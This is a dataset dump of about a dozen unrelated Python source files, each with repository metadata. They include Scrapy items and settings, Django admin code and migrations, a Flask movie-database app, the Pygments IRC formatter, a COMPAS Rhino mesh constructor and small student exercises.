|
[
"Apache-2.0"
] |
permissive
|
pythonyhd/finace
|
c8a7dca65dfe33cabcb90630d8791d3a5b942bc9
|
614d98ad92e1bbaa6cf7dc1d6dfaba4f24431688
|
refs/heads/master
| 2022-11-30T17:53:40.947747 | 2020-08-14T03:47:26 | 2020-08-14T03:47:26 | 287,253,978 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 262 |
py
|
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class FinaceItem(scrapy.Item):
    """Scrapy item for finance pages; no fields are declared yet."""
    # define the fields for your item here like:
    # name = scrapy.Field()
    pass
|
[
"[email protected]"
] | |
5da193ab8f0e2efa5b0645b1029e0314fd56b029
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_011/ch92_2019_10_02_17_54_14_425785.py
|
043154a806fa8650cc4d1a71882bef7df3c5440f
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 292 |
py
|
def simplifica_dict(dicionario):
    """Flatten *dicionario* into a list of its keys and values, in order,
    without duplicates.

    Each key is followed by the elements of its (iterable) value.  Bug fix:
    the original inner loop iterated over ``dicionario[chave]`` but ignored
    the loop variable, testing and appending the whole value container
    instead of each element.

    :param dicionario: mapping whose values are iterables of elements
    :returns: list of keys and value elements, first occurrence order
    """
    lista = []
    for chave in dicionario:
        if chave not in lista:
            lista.append(chave)
        for valor in dicionario[chave]:
            # Append each individual element (the original appended the
            # whole container here).
            if valor not in lista:
                lista.append(valor)
    return lista
|
[
"[email protected]"
] | |
ba8c4775490031f4b1abd9541e76e7d99773e96c
|
44845df9198ae8c80fabecb6ed3ae6a44e43f38c
|
/modo/admin.py
|
4aa582f42f92bbc0b441d3019c6b6fb02550a96f
|
[] |
no_license
|
CarlosSanz81/cima
|
570da404bddd0a813a025163a9e94676b9d0b4a9
|
3ad9b37af4a2d8a5789915208afffec7b6af3c0e
|
refs/heads/master
| 2021-01-23T08:00:04.964713 | 2017-03-28T14:33:09 | 2017-03-28T14:33:09 | 72,184,187 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 143 |
py
|
from django.contrib import admin
from .models import Modo
@admin.register(Modo)
class AdminModo(admin.ModelAdmin):
    """Django admin configuration for the Modo model."""
    # Columns shown in the admin change-list page.
    list_display = ('nombre',)
|
[
"[email protected]"
] | |
fcb878a2819bc83a0ed79bdb5b844916fa3fbdbe
|
794e14945c0521b4eab03e8b9a3f93b8fa14e021
|
/src/compas_rhino/utilities/constructors.py
|
e71275fa0d0e525a4bf92e58e2154310209ae1c9
|
[
"MIT"
] |
permissive
|
KEERTHANAUDAY/compas
|
5e8ada865bc87ee48ba77b3f6fd03661a9b9c17d
|
4d1101cf302f95a4472a01a1265cc64eaec6aa4a
|
refs/heads/master
| 2021-07-11T16:26:19.452926 | 2020-09-10T14:27:11 | 2020-09-10T14:27:11 | 294,453,684 | 0 | 0 |
MIT
| 2020-09-10T15:47:31 | 2020-09-10T15:47:30 | null |
UTF-8
|
Python
| false | false | 2,494 |
py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from compas.utilities import geometric_key
import Rhino
import scriptcontext as sc
__all__ = ['volmesh_from_polysurfaces']
def volmesh_from_polysurfaces(cls, guids):
    """Construct a volumetric mesh from given polysurfaces.

    Essentially, this function does the following:

    * find each of the polysurfaces and check if they have a boundary representation (b-rep)
    * convert to b-rep and extract the edge loops
    * make a face of each loop by referring to vertices using their geometric keys
    * add a cell per brep
    * and add the faces of a brep to the cell
    * create a volmesh from the found vertices and cells

    Parameters
    ----------
    cls : :class:`compas.datastructures.VolMesh`
        The class of volmesh.
    guids : sequence of str or System.Guid
        The *globally unique identifiers* of the polysurfaces.

    Returns
    -------
    :class:`compas.datastructures.Volmesh`
        The volumetric mesh object.

    """
    gkey_xyz = {}  # geometric key -> point; deduplicates shared vertices
    cells = []

    for guid in guids:
        cell = []
        obj = sc.doc.Objects.Find(guid)

        # Skip objects that cannot be represented as a brep.
        if not obj.Geometry.HasBrepForm:
            continue

        brep = Rhino.Geometry.Brep.TryConvertBrep(obj.Geometry)

        # Each edge loop of the brep becomes one face of the cell.
        for loop in brep.Loops:
            curve = loop.To3dCurve()
            segments = curve.Explode()
            face = []
            # The first segment contributes both of its end points ...
            sp = segments[0].PointAtStart
            ep = segments[0].PointAtEnd
            sp_gkey = geometric_key(sp)
            ep_gkey = geometric_key(ep)
            gkey_xyz[sp_gkey] = sp
            gkey_xyz[ep_gkey] = ep
            face.append(sp_gkey)
            face.append(ep_gkey)
            # ... while every following segment (except the closing one)
            # adds only its end point, whose start coincides with the
            # previous segment's end.
            for segment in segments[1:-1]:
                ep = segment.PointAtEnd
                ep_gkey = geometric_key(ep)
                face.append(ep_gkey)
                gkey_xyz[ep_gkey] = ep
            cell.append(face)
        cells.append(cell)

    # Remap geometric keys to contiguous vertex indices.
    gkey_index = dict((gkey, index) for index, gkey in enumerate(gkey_xyz))
    vertices = [list(xyz) for gkey, xyz in gkey_xyz.items()]
    cells = [[[gkey_index[gkey] for gkey in face] for face in cell] for cell in cells]

    return cls.from_vertices_and_cells(vertices, cells)
# ==============================================================================
# Main
# ==============================================================================
# Nothing to run on direct execution; this module is import-only.
if __name__ == "__main__":
    pass
|
[
"[email protected]"
] | |
339f9df0dd568b0dac0574b4653c263cc9d9af76
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/come_old_problem_to_point/ask_thing/see_day/seem_problem/time/find_few_week_over_point.py
|
b79ee7a454f58433209a2c9c27edba7f4f38079b
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 229 |
py
|
#! /usr/bin/env python
def government(str_arg):
    """Print *str_arg* (via use_public_day) followed by the fixed trailer."""
    use_public_day(str_arg)
    print('small_man_and_long_world')


def use_public_day(str_arg):
    """Echo *str_arg* to stdout."""
    print(str_arg)
# Demo invocation; runs only when executed as a script, not on import.
if __name__ == '__main__':
    government('ask_day_from_year')
|
[
"[email protected]"
] | |
a30686b6eabb2cac56f288acadb5c196580ebf70
|
e6947a8ecc14ddb3c078321958856f888953f4fa
|
/my_project.py
|
d96f10703e7f2af3f045b4ee516f87f077c77cb7
|
[] |
no_license
|
raja073/SimpleMovieDB
|
a5dd4b924f1ecb8d04a61c9884e25e6a51af5c3c
|
4d28dba684ea0ebf6ad4b78af4c2bdd13b072406
|
refs/heads/master
| 2021-09-05T13:59:35.372062 | 2018-01-28T14:06:57 | 2018-01-28T14:06:57 | 118,252,070 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,032 |
py
|
from flask import Flask, render_template, request, redirect, url_for
app = Flask(__name__) ### Instance of the Flask with name of the running application as an argument
#################################################################################################
# Adding database to Flask application
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Movie, Actor
# Bind the declarative models to the local SQLite database created by
# database_setup.py.
engine = create_engine('sqlite:///movieactors.db')
Base.metadata.bind = engine
# NOTE(review): one module-level session is shared by every request --
# acceptable for this toy app, not safe under concurrent access.
DBSession = sessionmaker(bind = engine)
session = DBSession()
#################################################################################################
@app.route('/')
@app.route('/movies')
def movieList():
    """Show the list of all movies in the database."""
    all_movies = session.query(Movie).all()
    return render_template('full_movie_list.html', movies=all_movies)
@app.route('/movie/<int:movie_id>/')
def movieActors(movie_id):
    """Show one movie together with its cast."""
    selected = session.query(Movie).filter_by(id=movie_id).one()
    cast = session.query(Actor).filter_by(movie_id=selected.id)
    return render_template('menu.html', movie=selected, actors=cast)
@app.route('/movie/new/', methods=['GET','POST'])
def newMovie():
    """Render the creation form; on POST persist a new movie."""
    if request.method != 'POST':
        return render_template('new_movie.html')
    movie = Movie(name=request.form['name'])
    session.add(movie)
    session.commit()
    return redirect(url_for('movieList'))
# Task 1: Create route for newActor function here
@app.route('/movie/<int:movie_id>/new/', methods=['GET','POST'])
def newActor(movie_id):
    """Render the new-actor form; on POST create an actor for this movie."""
    if request.method != 'POST':
        return render_template('new_actor.html', movie_id=movie_id)
    actor = Actor(name=request.form['name'], gender=request.form['gender'],
                  age=request.form['age'], biography=request.form['bio'],
                  movie_id=movie_id)
    session.add(actor)
    session.commit()
    return redirect(url_for('movieActors', movie_id=movie_id))
# Task 2: Create route for editActor function here
@app.route('/movie/<int:movie_id>/<int:actor_id>/edit/', methods=['GET','POST'])
def editActor(movie_id, actor_id):
    """Render the edit form; on POST update the actor's name."""
    actor = session.query(Actor).filter_by(id=actor_id).one()
    if request.method != 'POST':
        return render_template('edit_actors.html', movie_id=movie_id,
                               actor_id=actor_id, i=actor)
    # An empty submitted name leaves the stored name unchanged.
    if request.form['name']:
        actor.name = request.form['name']
    session.add(actor)
    session.commit()
    return redirect(url_for('movieActors', movie_id=movie_id))
# Task 3: Create route for deleteActor function here
@app.route('/movie/<int:movie_id>/<int:actor_id>/delete/', methods=['GET','POST'])
def deleteActor(movie_id, actor_id):
    """Show a confirmation page; on POST remove the actor."""
    actor = session.query(Actor).filter_by(id=actor_id).one()
    if request.method != 'POST':
        return render_template('delete_actor.html', i=actor)
    session.delete(actor)
    session.commit()
    return redirect(url_for('movieActors', movie_id=movie_id))
if __name__ == '__main__':
    # Debug mode enables the reloader and interactive tracebacks;
    # do not use in production.
    app.debug = True
    app.run(host = '0.0.0.0', port = 5000)
|
[
"[email protected]"
] | |
9fd2adff33eb37163fba31027204557321194233
|
6320fef2ea7376c2b35f97f1a5af004e90f09098
|
/1-2주차 실습(복습)/venv/Lib/site-packages/pygments/formatters/irc.py
|
49f8b3d13114e627e86ef8bdd693496bd155fd7f
|
[] |
no_license
|
Dplo1514/ploaistudy
|
7aa08d7f71653748a9e32dcc09ee8f6cec0aaed9
|
e35e42b1e5f0c90cc1e2a59993a1ef73d8872d0c
|
refs/heads/master
| 2023-09-03T00:45:55.601651 | 2021-10-24T12:19:38 | 2021-10-24T12:19:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,026 |
py
|
"""
pygments.formatters.irc
~~~~~~~~~~~~~~~~~~~~~~~
Formatter for IRC output
:copyright: Copyright 2006-2021 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys
from pygments.formatter import Formatter
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Token, Whitespace
from pygments.util import get_choice_opt
__all__ = ['IRCFormatter']
#: Map token types to a tuple of color values for light and dark
#: backgrounds.  Each value is a name from IRC_COLOR_MAP, optionally
#: wrapped in ``_`` (italic) and/or ``*`` (bold) -- see ircformat() below.
IRC_COLORS = {
    Token: ('', ''),
    Whitespace: ('gray', 'brightblack'),
    Comment: ('gray', 'brightblack'),
    Comment.Preproc: ('cyan', 'brightcyan'),
    Keyword: ('blue', 'brightblue'),
    Keyword.Type: ('cyan', 'brightcyan'),
    Operator.Word: ('magenta', 'brightcyan'),
    Name.Builtin: ('cyan', 'brightcyan'),
    Name.Function: ('green', 'brightgreen'),
    Name.Namespace: ('_cyan_', '_brightcyan_'),
    Name.Class: ('_green_', '_brightgreen_'),
    Name.Exception: ('cyan', 'brightcyan'),
    Name.Decorator: ('brightblack', 'gray'),
    Name.Variable: ('red', 'brightred'),
    Name.Constant: ('red', 'brightred'),
    Name.Attribute: ('cyan', 'brightcyan'),
    Name.Tag: ('brightblue', 'brightblue'),
    String: ('yellow', 'yellow'),
    Number: ('blue', 'brightblue'),
    Generic.Deleted: ('brightred', 'brightred'),
    Generic.Inserted: ('green', 'brightgreen'),
    Generic.Heading: ('**', '**'),
    Generic.Subheading: ('*magenta*', '*brightmagenta*'),
    Generic.Error: ('brightred', 'brightred'),
    Error: ('_brightred_', '_brightred_'),
}
# Color name -> mIRC numeric color code; several names alias the same code
# for compatibility with the ANSI color names used elsewhere in Pygments.
IRC_COLOR_MAP = {
    'white': 0,
    'black': 1,
    'blue': 2,
    'brightgreen': 3,
    'brightred': 4,
    'yellow': 5,
    'magenta': 6,
    'orange': 7,
    'green': 7, #compat w/ ansi
    'brightyellow': 8,
    'lightgreen': 9,
    'brightcyan': 9, # compat w/ ansi
    'cyan': 10,
    'lightblue': 11,
    'red': 11, # compat w/ ansi
    'brightblue': 12,
    'brightmagenta': 13,
    'brightblack': 14,
    'gray': 15,
}
def ircformat(color, text):
    """Wrap *text* in mIRC control codes for the given *color* spec.

    *color* is a name from IRC_COLOR_MAP, optionally wrapped in ``_`` for
    italic and/or ``*`` for bold (e.g. ``'*brightmagenta*'``).  An empty
    spec returns the text unchanged.
    """
    if len(color) < 1:
        return text
    add = sub = ''
    if '_' in color: # italic
        add += '\x1D'
        sub = '\x1D' + sub
        color = color.strip('_')
    if '*' in color: # bold
        add += '\x02'
        sub = '\x02' + sub
        color = color.strip('*')
    # underline (\x1F) not supported
    # backgrounds (\x03FF,BB) not supported
    if len(color) > 0: # actual color - may have issues with ircformat("red", "blah")+"10" type stuff
        add += '\x03' + str(IRC_COLOR_MAP[color]).zfill(2)
        sub = '\x03' + sub
        return add + text + sub
    # NOTE(review): reached only for bold/italic-only specs (the color name
    # strips down to '').  Emitting literal '<'/'>' around the control codes
    # looks unintended -- confirm against the expected IRC output.
    return '<'+add+'>'+text+'</'+sub+'>'
class IRCFormatter(Formatter):
    r"""
    Format tokens with IRC color sequences

    The `get_style_defs()` method doesn't do anything special since there is
    no support for common styles.

    Options accepted:

    `bg`
        Set to ``"light"`` or ``"dark"`` depending on the terminal's background
        (default: ``"light"``).

    `colorscheme`
        A dictionary mapping token types to (lightbg, darkbg) color names or
        ``None`` (default: ``None`` = use builtin colorscheme).

    `linenos`
        Set to ``True`` to have line numbers in the output as well
        (default: ``False`` = no line numbers).
    """
    name = 'IRC'
    aliases = ['irc', 'IRC']
    filenames = []

    def __init__(self, **options):
        Formatter.__init__(self, **options)
        # Index 1 of each colorscheme tuple is the dark-background variant.
        self.darkbg = get_choice_opt(options, 'bg',
                                     ['light', 'dark'], 'light') == 'dark'
        self.colorscheme = options.get('colorscheme', None) or IRC_COLORS
        self.linenos = options.get('linenos', False)
        self._lineno = 0  # current output line number (incremented per write)

    def _write_lineno(self, outfile):
        # Emit a newline plus a zero-padded line-number gutter.
        self._lineno += 1
        outfile.write("\n%04d: " % self._lineno)

    def _format_unencoded_with_lineno(self, tokensource, outfile):
        self._write_lineno(outfile)

        for ttype, value in tokensource:
            if value.endswith("\n"):
                self._write_lineno(outfile)
                value = value[:-1]
            # Walk up the token hierarchy until a mapped type is found;
            # Token itself is always present, so this terminates.
            color = self.colorscheme.get(ttype)
            while color is None:
                ttype = ttype[:-1]
                color = self.colorscheme.get(ttype)
            if color:
                color = color[self.darkbg]
                spl = value.split('\n')
                for line in spl[:-1]:
                    self._write_lineno(outfile)
                    if line:
                        # NOTE(review): the [:-1] slice drops the last
                        # character of each full line, whereas
                        # format_unencoded() below writes the whole line --
                        # looks like a bug; confirm against upstream.
                        outfile.write(ircformat(color, line[:-1]))
                if spl[-1]:
                    outfile.write(ircformat(color, spl[-1]))
            else:
                outfile.write(value)

        outfile.write("\n")

    def format_unencoded(self, tokensource, outfile):
        # Delegate to the line-numbered variant when requested.
        if self.linenos:
            self._format_unencoded_with_lineno(tokensource, outfile)
            return

        for ttype, value in tokensource:
            color = self.colorscheme.get(ttype)
            while color is None:
                ttype = ttype[:-1]
                color = self.colorscheme.get(ttype)
            if color:
                color = color[self.darkbg]
                spl = value.split('\n')
                for line in spl[:-1]:
                    if line:
                        outfile.write(ircformat(color, line))
                    outfile.write('\n')
                if spl[-1]:
                    outfile.write(ircformat(color, spl[-1]))
            else:
                outfile.write(value)
|
[
"[email protected]"
] | |
874faf954ae174bedcfe8ce4f42f219ac04bd355
|
14449108de18a8e956830cd7d5107bb38de41c5d
|
/workshopvenues/venues/migrations/0009_auto__del_field_venue_address.py
|
45329577f0f1c85666401d3a4ba848f7477f2436
|
[
"BSD-3-Clause"
] |
permissive
|
andreagrandi/workshopvenues
|
736e53ccb6ff0b15503e92a5246b945f615d2ff8
|
21978de36f443296788727d709f7f42676b24484
|
refs/heads/master
| 2021-05-16T03:00:23.879925 | 2014-03-18T15:10:00 | 2014-03-18T15:10:00 | 8,843,235 | 1 | 3 | null | 2015-10-26T11:11:20 | 2013-03-17T23:19:33 |
Python
|
UTF-8
|
Python
| false | false | 3,698 |
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: drop the FK column venues_venue.address_id.

    Irreversible -- backwards() raises because the non-null FK values
    cannot be restored once deleted.
    """

    def forwards(self, orm):
        # Deleting field 'Venue.address'
        db.delete_column(u'venues_venue', 'address_id')

    def backwards(self, orm):
        # User chose to not deal with backwards NULL issues for 'Venue.address'
        raise RuntimeError("Cannot reverse this migration. 'Venue.address' and its values cannot be restored.")

        # The following code is provided here to aid in writing a correct migration
        # Adding field 'Venue.address'
        db.add_column(u'venues_venue', 'address',
                      self.gf('django.db.models.fields.related.ForeignKey')(to=orm['venues.Address']),
                      keep_default=False)

    # Frozen ORM snapshot South uses to build the `orm` argument above.
    models = {
        u'venues.address': {
            'Meta': {'object_name': 'Address'},
            'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['venues.Country']", 'null': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'postcode': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
            'street': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'town': ('django.db.models.fields.CharField', [], {'max_length': '30'})
        },
        u'venues.country': {
            'Meta': {'object_name': 'Country'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
        },
        u'venues.facility': {
            'Meta': {'object_name': 'Facility'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
        },
        u'venues.image': {
            'Meta': {'object_name': 'Image'},
            'filename': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'venue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['venues.Venue']"})
        },
        u'venues.venue': {
            'Meta': {'object_name': 'Venue'},
            'capacity': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
            'contact': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
            'contact_email': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
            'contact_twitter': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
            'cost': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
            'facilities': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['venues.Facility']", 'symmetrical': 'False'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
            'phone': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'style': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
            'twitter': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
            'website': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'})
        }
    }

    complete_apps = ['venues']
|
[
"[email protected]"
] | |
d3813671c7b96dd94e66342390d4574c412700a3
|
ef32b87973a8dc08ba46bf03c5601548675de649
|
/pytglib/api/functions/search_user_by_phone_number.py
|
218f9710f017f0467ab39dc7429e7841c3300db5
|
[
"MIT"
] |
permissive
|
iTeam-co/pytglib
|
1a7580f0e0c9e317fbb0de1d3259c8c4cb90e721
|
d3b52d7c74ee5d82f4c3e15e4aa8c9caa007b4b5
|
refs/heads/master
| 2022-07-26T09:17:08.622398 | 2022-07-14T11:24:22 | 2022-07-14T11:24:22 | 178,060,880 | 10 | 9 | null | null | null | null |
UTF-8
|
Python
| false | false | 751 |
py
|
from ..utils import Object
class SearchUserByPhoneNumber(Object):
    """
    Looks a user up by phone number; the request resolves to a 404 error
    when no matching user exists

    Attributes:
        ID (:obj:`str`): ``SearchUserByPhoneNumber``

    Args:
        phone_number (:obj:`str`):
            Phone number to search for

    Returns:
        User

    Raises:
        :class:`telegram.Error`
    """
    ID = "searchUserByPhoneNumber"

    def __init__(self, phone_number, extra=None, **kwargs):
        self.phone_number = phone_number  # str
        self.extra = extra

    @staticmethod
    def read(q: dict, *args) -> "SearchUserByPhoneNumber":
        # Rebuild the request object straight from the raw TDLib dict.
        return SearchUserByPhoneNumber(q.get('phone_number'))
|
[
"[email protected]"
] | |
1c23cd9bec50756f3a2bea2745a173ac45cdc882
|
c278b06f77cac0a2942fa2ca0636f2dc72b52505
|
/4.blog_project/mydjangoproject/blog/migrations/0004_auto_20190320_0504.py
|
f8a4d492ef89b65190cfc991db5c4e1a9cab6c16
|
[] |
no_license
|
hooong/Django_study
|
2d27bc7d5b2ad53fa4c9e1bcd808437af98cbe09
|
b760ace8f562d538ad18d552388e48ed52cc78d1
|
refs/heads/master
| 2022-12-02T15:51:24.510596 | 2019-11-02T07:38:37 | 2019-11-02T07:38:37 | 165,012,883 | 5 | 1 | null | 2022-11-22T03:26:18 | 2019-01-10T07:35:07 |
Python
|
UTF-8
|
Python
| false | false | 318 |
py
|
# Generated by Django 2.1.5 on 2019-03-20 05:04
from django.db import migrations
class Migration(migrations.Migration):
    """Reset Comment's Meta options (ordering etc.) to Django defaults."""

    dependencies = [
        ('blog', '0003_blog_blog_hit'),
    ]

    operations = [
        # An empty options dict clears every previously declared Meta option.
        migrations.AlterModelOptions(
            name='comment',
            options={},
        ),
    ]
|
[
"[email protected]"
] | |
81d70837b62ed7c9dbad2ad8927c5d723e1d4953
|
63e2bed7329c79bf67279f9071194c9cba88a82c
|
/SevOneApi/python-client/test/test_performance_metrics_settings.py
|
5471c91fa1f10ac623252fd1733b391f5e288962
|
[] |
no_license
|
jsthomason/LearningPython
|
12422b969dbef89578ed326852dd65f65ab77496
|
2f71223250b6a198f2736bcb1b8681c51aa12c03
|
refs/heads/master
| 2021-01-21T01:05:46.208994 | 2019-06-27T13:40:37 | 2019-06-27T13:40:37 | 63,447,703 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,001 |
py
|
# coding: utf-8
"""
SevOne API Documentation
Supported endpoints by the new RESTful API # noqa: E501
OpenAPI spec version: 2.1.18, Hash: db562e6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.performance_metrics_settings import PerformanceMetricsSettings # noqa: E501
from swagger_client.rest import ApiException
class TestPerformanceMetricsSettings(unittest.TestCase):
    """PerformanceMetricsSettings unit test stubs (swagger-codegen generated)."""

    def setUp(self):
        # No fixtures needed for a construction-only smoke test.
        pass

    def tearDown(self):
        pass

    def testPerformanceMetricsSettings(self):
        """Test PerformanceMetricsSettings"""
        # FIXME: construct object with mandatory attributes with example values
        # model = swagger_client.models.performance_metrics_settings.PerformanceMetricsSettings()  # noqa: E501
        pass


if __name__ == '__main__':
    unittest.main()
|
[
"[email protected]"
] | |
2e56f5cdcb6487d4631e61f2dd8ee8baa69b504c
|
0fb3b73f8e6bb9e931afe4dcfd5cdf4ba888d664
|
/Web-UI/scrapyproject/migrations/0010_auto_20170406_1835.py
|
28afbaa4d39615071f49bc6050e0d270de3e4686
|
[
"MIT"
] |
permissive
|
mrpal39/ev_code
|
6c56b1a4412503604260b3346a04ef53a2ba8bf2
|
ffa0cf482fa8604b2121957b7b1d68ba63b89522
|
refs/heads/master
| 2023-03-24T03:43:56.778039 | 2021-03-08T17:48:39 | 2021-03-08T17:48:39 | 345,743,264 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 432 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Drop the MongoPass model: detach its user FK, then delete the model."""

    dependencies = [
        ('scrapyproject', '0009_auto_20170215_0657'),
    ]

    operations = [
        # The FK must be removed before the model itself can be deleted.
        migrations.RemoveField(
            model_name='mongopass',
            name='user',
        ),
        migrations.DeleteModel(
            name='MongoPass',
        ),
    ]
|
[
"[email protected]"
] | |
6fcc525132976c116ea70511282befacca492375
|
573a516233447c8384f26ed56ae4e356e3995153
|
/ques6.py
|
c06b87f3ab0dae128a898dd372ba780d807a5d97
|
[] |
no_license
|
BhagyashreeKarale/if-else
|
437b0867247f827c44f469a90efeecbf9444803d
|
1224fca2bdda389b22897f17b22f21320260e75f
|
refs/heads/main
| 2023-07-19T15:03:03.351825 | 2021-09-11T19:16:07 | 2021-09-11T19:16:07 | 397,150,813 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 441 |
py
|
# Question 6
# Take two numbers as input from the user in variables varx and vary.
# Check whether varx is divisible by vary.
# If yes, print Divisible else print Not Divisible.
varx = int(input("Enter dividend:\n"))
vary = int(input("Enter divisor:\n"))
if vary == 0:
    # Guard: varx % 0 would raise ZeroDivisionError; report it instead.
    print("Divisor must be non-zero; division by zero is undefined.")
elif varx % vary == 0:
    print(varx, "is completely divisible by", vary)
else:
    print(varx, "isn't completely divisible by", vary)
|
[
"[email protected]"
] | |
3ddc20aebdc144d9693019af06524d5ea4513712
|
78a28bd6b95041bfe67d8aa6a3a3c111911afaab
|
/18.Web Scraping with Python Scrapy - RM/03_Advanced_Techniques/news_scraper/news_scraper/settings.py
|
dec217105fcd124cbb665b4076642b6d93bf5eb9
|
[
"MIT"
] |
permissive
|
jailukanna/Python-Projects-Dojo
|
8200a60ab925bf796bd39cb1977e6f0e0a575c23
|
98c7234b84f0afea99a091c7198342d66bbdff5b
|
refs/heads/master
| 2023-03-15T06:54:38.141189 | 2021-03-11T08:17:02 | 2021-03-11T08:17:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,212 |
py
|
# Scrapy settings for news_scraper project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'news_scraper'

SPIDER_MODULES = ['news_scraper.spiders']
NEWSPIDER_MODULE = 'news_scraper.spiders'

# Stop the crawl automatically once 10 pages have been fetched
# (CloseSpider extension).
CLOSESPIDER_PAGECOUNT = 10
# NOTE(review): FEED_URI/FEED_FORMAT are the legacy (pre-Scrapy-2.1) export
# settings; newer Scrapy expects the FEEDS dict -- confirm the project's
# Scrapy version before migrating.
FEED_URI = 'news_articles.json'
FEED_FORMAT = 'json'

# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'news_scraper (+http://www.yourdomain.com)'

# Obey robots.txt rules
# Deliberately disabled so the tutorial crawl is not filtered by robots.txt.
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
# DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
# }
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
# 'news_scraper.middlewares.NewsScraperSpiderMiddleware': 543,
# }
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# DOWNLOADER_MIDDLEWARES = {
# 'news_scraper.middlewares.NewsScraperDownloaderMiddleware': 543,
# }
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
# EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
# }
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# ITEM_PIPELINES = {
# 'news_scraper.pipelines.NewsScraperPipeline': 300,
# }
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
